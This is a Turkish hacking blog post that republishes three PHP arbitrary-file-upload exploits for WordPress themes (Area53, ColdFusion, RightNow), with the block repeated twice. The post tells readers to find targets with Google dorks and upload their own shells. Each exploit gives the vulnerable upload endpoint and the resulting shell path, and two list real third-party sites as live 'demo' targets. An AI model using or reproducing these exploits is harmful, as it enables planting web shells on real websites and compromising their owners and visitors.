Priv8 | Local Root Exploit # HeRoTurk

s

Google arama dorklarını teker teker aratın sonra exploitler aracılığıyla shellinizi uplayabilirsiniz. Exploitleri php olarak kaydedin ve localhostta çalıştırın.

Kod:

###################################################################################################
#_________            .___        _______                ___.   .__       
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____ 
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/
###################################################################################################
# Exploit Title: WordPress Area53 theme Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 10/19/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/area53-a-responsive-html5-wordpress-theme/2538737
# Affected Version: v1.0.1 - v1.0.5
# Price: $50
# Category: webapps/php
# Google dork: inurl:wp-content/themes/area53/
###################################################################################################
  
# Exploit
  
<?php
$uploadfile = "up.php";
$ch = curl_init(“http://site.com/wordpress/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘qqfile’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
  
#Shell path: http://site.com/wordpress/wp-content/uploads/2013/10/up.php

Kod:

###############################################################
# Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
# Google dork: inurl:wp-content/themes/ColdFusion/
###############################################################
 
 
= = = = = = = =
1)Exploit     =
2)Real Demo   =
= = = = = = = =
 
1)Exploit :
= = = = = =
 
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
2) Exploit demo :
= = = = = = = = =
http://www.laughingcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-photo.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manuel-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
# #### #### #### #### #### #### #### #### #
 
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

Kod:

###############################################################
# Exploit Title: WordPress Right Now theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/right-now-wp-full-video-image-with-audio/1575990
# Category: webapps/php
# Google dork: inurl:wp-content/themes/RightNow/
###############################################################
 
 
= = = = = = = =
1)Exploit     =
2)Real Demo   =
= = = = = = = =
 
1)Exploit :
= = = = = =
 
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
2) Exploit demo :
= = = = = = = = =
http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
 
# #### #### #### #### #### #### #### #### #
 
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

s

Google arama dorklarını teker teker aratın sonra exploitler aracılığıyla shellinizi uplayabilirsiniz. Exploitleri php olarak kaydedin ve localhostta çalıştırın.

Kod:

###################################################################################################
#_________            .___        _______                ___.   .__       
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____ 
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/
###################################################################################################
# Exploit Title: WordPress Area53 theme Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 10/19/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/area53-a-responsive-html5-wordpress-theme/2538737
# Affected Version: v1.0.1 - v1.0.5
# Price: $50
# Category: webapps/php
# Google dork: inurl:wp-content/themes/area53/
###################################################################################################
  
# Exploit
  
<?php
$uploadfile = "up.php";
$ch = curl_init(“http://site.com/wordpress/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘qqfile’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
  
#Shell path: http://site.com/wordpress/wp-content/uploads/2013/10/up.php

Kod:

###############################################################
# Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
# Google dork: inurl:wp-content/themes/ColdFusion/
###############################################################
 
 
= = = = = = = =
1)Exploit     =
2)Real Demo   =
= = = = = = = =
 
1)Exploit :
= = = = = =
 
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
2) Exploit demo :
= = = = = = = = =
http://www.laughingcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-photo.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manuel-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
# #### #### #### #### #### #### #### #### #
 
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

Kod:

###############################################################
# Exploit Title: WordPress Right Now theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/right-now-wp-full-video-image-with-audio/1575990
# Category: webapps/php
# Google dork: inurl:wp-content/themes/RightNow/
###############################################################
 
 
= = = = = = = =
1)Exploit     =
2)Real Demo   =
= = = = = = = =
 
1)Exploit :
= = = = = =
 
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
2) Exploit demo :
= = = = = = = = =
http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
 
# #### #### #### #### #### #### #### #### #
 
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

Priv8 | Local Root Exploit # HeRoTurk

4 Kasım 2013 Pazartesi

Standart wordpress temalarından kaynaklı açıklar

Hiç yorum yok:

Yorum Gönder

Standart wordpress temalarından kaynaklı açıklar

Hiç yorum yok:

Yorum Gönder

Popüler

Popular Posts